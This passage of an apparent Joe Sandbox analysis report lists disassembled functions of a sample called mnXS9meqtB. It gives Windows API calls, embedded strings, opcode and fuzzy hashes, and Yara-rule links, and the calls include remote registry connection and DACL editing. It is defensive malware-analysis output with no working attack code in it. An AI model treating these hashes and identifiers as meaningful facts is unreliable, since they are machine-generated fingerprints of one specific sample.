                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 1212759294-1154884017
                                                                            • Opcode ID: 00bc52938de1586596192f46aefbd5556dbe239041f7839d9ae086f120151bd1
                                                                            • Instruction ID: 3ae42709ce088f20048a63a5778e8023c544e4099c35b1c72cfcecb98910f687
                                                                            • Opcode Fuzzy Hash: 00bc52938de1586596192f46aefbd5556dbe239041f7839d9ae086f120151bd1
                                                                            • Instruction Fuzzy Hash: 6061C171540225BAEB16DF64DC46FFE77ACBB19724F108105F915EA0D1EB70D984CBA0
                                                                            Function 0034D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0034D292
                                                                            • GetDriveTypeW.KERNEL32 ref: 0034D2DF
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0034D327
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0034D35E
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0034D38C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 1148790751-4113822522
                                                                            • Opcode ID: b034d41c1e5835010cba59c6a20d32977a647629e74143944d915b8435f5522b
                                                                            • Instruction ID: d14a45f8700cee0531e7bb5f7fe7f8ee13ab5b5cc666602bc104f21c469f5d30
                                                                            • Opcode Fuzzy Hash: b034d41c1e5835010cba59c6a20d32977a647629e74143944d915b8435f5522b
                                                                            • Instruction Fuzzy Hash: 69513C752043059FC706EF10C8919AEB7E8FF98758F10895DF8966B2A1DB31EE05CB92
                                                                            Function 003426BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00373973,00000016,0000138C,00000016,?,00000016,0039DDB4,00000000,?), ref: 003426F1
                                                                            • LoadStringW.USER32(00000000,?,00373973,00000016), ref: 003426FA
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00373973,00000016,0000138C,00000016,?,00000016,0039DDB4,00000000,?,00000016), ref: 0034271C
                                                                            • LoadStringW.USER32(00000000,?,00373973,00000016), ref: 0034271F
                                                                            • __swprintf.LIBCMT ref: 0034276F
                                                                            • __swprintf.LIBCMT ref: 00342780
                                                                            • _wprintf.LIBCMT ref: 00342829
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00342840
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 618562835-2268648507
                                                                            • Opcode ID: 369ec264d691820e54eb324ebca2d6f3882724d7446512d03457f713095d3ed5
                                                                            • Instruction ID: d75e157e633aed5f431d4419410f58a62245bc4db975ea3c1d2b310d8b1b3598
                                                                            • Opcode Fuzzy Hash: 369ec264d691820e54eb324ebca2d6f3882724d7446512d03457f713095d3ed5
                                                                            • Instruction Fuzzy Hash: 68413E72801219AACF16FBE0DDA6DEFB778AF14344F500165F6057A0D2EA746F09CBA0
                                                                            Function 0034D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0034D0D8
                                                                            • __swprintf.LIBCMT ref: 0034D0FA
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0034D137
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0034D15C
                                                                            • _memset.LIBCMT ref: 0034D17B
                                                                            • _wcsncpy.LIBCMT ref: 0034D1B7
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0034D1EC
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0034D1F7
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0034D200
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0034D20A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: d38e9a392c0e4320f138ecc97430f40c39d76b0ee7816dad342c7e0da27bf335
                                                                            • Instruction ID: 0f5ed60184cd57e85ab132ca6cf524da2c59acabe4d80f104ee1919abd3e365b
                                                                            • Opcode Fuzzy Hash: d38e9a392c0e4320f138ecc97430f40c39d76b0ee7816dad342c7e0da27bf335
                                                                            • Instruction Fuzzy Hash: 5F3183B6500219ABDB22DFA4DC49FEB77BCEF89740F1040B6F509D61A1E770E6458B24
                                                                            Function 0036E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0036BEF4,?,?), ref: 0036E754
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E76B
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E776
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E783
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0036E78C
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E79B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0036E7A4
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E7AB
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0036BEF4,?,?,00000000,?), ref: 0036E7BC
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0038D9BC,?), ref: 0036E7D5
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0036E7E5
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0036E809
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0036E834
                                                                            • DeleteObject.GDI32(00000000), ref: 0036E85C
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0036E872
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: fd19d5d753f488258734c9222be6cad2531f246459626ef6f565f4e7a454210a
                                                                            • Instruction ID: f12e1e95e077f43bb33e3f4b2a811e0382a9736e8f6b446b23208eaf8b569d66
                                                                            • Opcode Fuzzy Hash: fd19d5d753f488258734c9222be6cad2531f246459626ef6f565f4e7a454210a
                                                                            • Instruction Fuzzy Hash: E8414A75600308EFDB129F65DC88EAA7BBCEF89B21F108498F905D72A0D7309D44DB60
                                                                            Function 003505F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 0035076F
                                                                            • _wcscat.LIBCMT ref: 00350787
                                                                            • _wcscat.LIBCMT ref: 00350799
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003507AE
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003507C2
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 003507DA
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 003507F4
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350806
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                            • String ID: *.*
                                                                            • API String ID: 34673085-438819550
                                                                            • Opcode ID: 734cb2449a20a04b8aebb8bf2ac9a3edcb3c157702d58cc36b7f53ca55020aab
                                                                            • Instruction ID: 25965de683a5eb273264ed5eb5f39acd809af2bd9ad8a8bcaba08b56e3fc966e
                                                                            • Opcode Fuzzy Hash: 734cb2449a20a04b8aebb8bf2ac9a3edcb3c157702d58cc36b7f53ca55020aab
                                                                            • Instruction Fuzzy Hash: 258180715043019FCB2ADF64C855D6AB3E8FB88305F15882AFC85DB261E732E9588B92
                                                                            Function 0036EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0036EF3B
                                                                            • GetFocus.USER32 ref: 0036EF4B
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0036EF56
                                                                            • _memset.LIBCMT ref: 0036F081
                                                                            • GetMenuItemInfoW.USER32 ref: 0036F0AC
                                                                            • GetMenuItemCount.USER32(00000000), ref: 0036F0CC
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0036F0DF
                                                                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0036F113
                                                                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0036F15B
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0036F193
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0036F1C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1296962147-4108050209
                                                                            • Opcode ID: 38c7971f7567e4f3e754631c79188772464c36cb6f2793099bf207121319eb2b
                                                                            • Instruction ID: 5e12f6a5baed31a50d99f2d3012b01e98ba8bfe084953ef3f36a525ed2cbcfe1
                                                                            • Opcode Fuzzy Hash: 38c7971f7567e4f3e754631c79188772464c36cb6f2793099bf207121319eb2b
                                                                            • Instruction Fuzzy Hash: FE81DF75108301EFD712CF14D884A6BBBE8FF8A354F01892EF9949B291D770D905CBA2
                                                                            Function 0033A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0033ABD7
                                                                              • Part of subcall function 0033ABBB: GetLastError.KERNEL32(?,0033A69F,?,?,?), ref: 0033ABE1
                                                                              • Part of subcall function 0033ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0033A69F,?,?,?), ref: 0033ABF0
                                                                              • Part of subcall function 0033ABBB: HeapAlloc.KERNEL32(00000000,?,0033A69F,?,?,?), ref: 0033ABF7
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0033AC0E
                                                                              • Part of subcall function 0033AC56: GetProcessHeap.KERNEL32(00000008,0033A6B5,00000000,00000000,?,0033A6B5,?), ref: 0033AC62
                                                                              • Part of subcall function 0033AC56: HeapAlloc.KERNEL32(00000000,?,0033A6B5,?), ref: 0033AC69
                                                                              • Part of subcall function 0033AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0033A6B5,?), ref: 0033AC7A
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0033A8CB
                                                                            • _memset.LIBCMT ref: 0033A8E0
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0033A8FF
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A910
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0033A94D
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0033A969
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A986
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0033A995
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0033A99C
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0033A9BD
                                                                            • CopySid.ADVAPI32(00000000), ref: 0033A9C4
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0033A9F5
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0033AA1B
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0033AA2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: bbac707d2a3e96d7c56ac5f437ab60a606a41a0041d735986c9bef3db22bad91
                                                                            • Instruction ID: 696bf0d9987b219aefd604b0692220a8aac95fb06b25aa8c889f8795c8f7e711
                                                                            • Opcode Fuzzy Hash: bbac707d2a3e96d7c56ac5f437ab60a606a41a0041d735986c9bef3db22bad91
                                                                            • Instruction Fuzzy Hash: 12516CB1900609AFDF12DFA4DD85EEEBBB9FF04300F048169F955AB290DB359A05CB61
                                                                            Function 0034CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2889450990-2391861430
                                                                            • Opcode ID: 65546725a94869d3ccd5333cfce72cd342f52cf52dd5f2541198f97a6694ae2c
                                                                            • Instruction ID: 13e0238506602230fc7a4051248b41ad1d061f993c05232d00cb57a859cc1c6b
                                                                            • Opcode Fuzzy Hash: 65546725a94869d3ccd5333cfce72cd342f52cf52dd5f2541198f97a6694ae2c
                                                                            • Instruction Fuzzy Hash: F2516A72901119AACF17EBE0DD52EEEB7B8AF09304F100165F5057A0A2EB716F59DF60
                                                                            Function 0034CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2889450990-3420473620
                                                                            • Opcode ID: 537dd6aa1b935bd813c748b818ced45aff11f7bdbccf48261555929b9a1ee14e
                                                                            • Instruction ID: 9e0d548f1d4e87bcbac6ffda4b41da9319797351b52ae064a3a2ec63d1b46ae0
                                                                            • Opcode Fuzzy Hash: 537dd6aa1b935bd813c748b818ced45aff11f7bdbccf48261555929b9a1ee14e
                                                                            • Instruction Fuzzy Hash: 2351AD72801219AACF17EBE0DE52EEEB7B8AF04344F100165F5057A0A2EB746F59DF60
                                                                            Function 00363C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: $E;$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-200817795
                                                                            • Opcode ID: 13e3e31ef27ec9f9038faf4fabc43f2325cf81f1f6dee0ba9387961a8f6f003a
                                                                            • Instruction ID: 937b53de7d85e20f183e82c05f22c94b6222ac8a756ef0606382f929bc1eadf8
                                                                            • Opcode Fuzzy Hash: 13e3e31ef27ec9f9038faf4fabc43f2325cf81f1f6dee0ba9387961a8f6f003a
                                                                            • Instruction Fuzzy Hash: AB416D3411024B8BDF17EF10DC51AEB3365AF2A344F118815FC551F6AAEB71AE9ACB60
                                                                            Function 003455BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 003455D7
                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00345664
                                                                            • GetMenuItemCount.USER32(003C1708), ref: 003456ED
                                                                            • DeleteMenu.USER32(003C1708,00000005,00000000,000000F5,?,?), ref: 0034577D
                                                                            • DeleteMenu.USER32(003C1708,00000004,00000000), ref: 00345785
                                                                            • DeleteMenu.USER32(003C1708,00000006,00000000), ref: 0034578D
                                                                            • DeleteMenu.USER32(003C1708,00000003,00000000), ref: 00345795
                                                                            • GetMenuItemCount.USER32(003C1708), ref: 0034579D
                                                                            • SetMenuItemInfoW.USER32(003C1708,00000004,00000000,00000030), ref: 003457D3
                                                                            • GetCursorPos.USER32(?), ref: 003457DD
                                                                            • SetForegroundWindow.USER32(00000000), ref: 003457E6
                                                                            • TrackPopupMenuEx.USER32(003C1708,00000000,?,00000000,00000000,00000000), ref: 003457F9
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00345805
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 3993528054-0
                                                                            • Opcode ID: 8f77e20de1791ad40ecdbf0035d93678a866487ea1d63c75d799a2388563d808
                                                                            • Instruction ID: c47fc51c77116361cd5776e7ada530fab71b1d6f0e27ad2dc5310fe12842dc4b
                                                                            • Opcode Fuzzy Hash: 8f77e20de1791ad40ecdbf0035d93678a866487ea1d63c75d799a2388563d808
                                                                            • Instruction Fuzzy Hash: 53710330A40615BFEB229B14DC49FAABFA9FF01368F254216F6146E1D2C7757C10DB90
                                                                            Function 0033A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0033A1DC
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0033A211
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0033A22D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0033A249
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0033A273
                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0033A29B
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0033A2A6
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0033A2AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
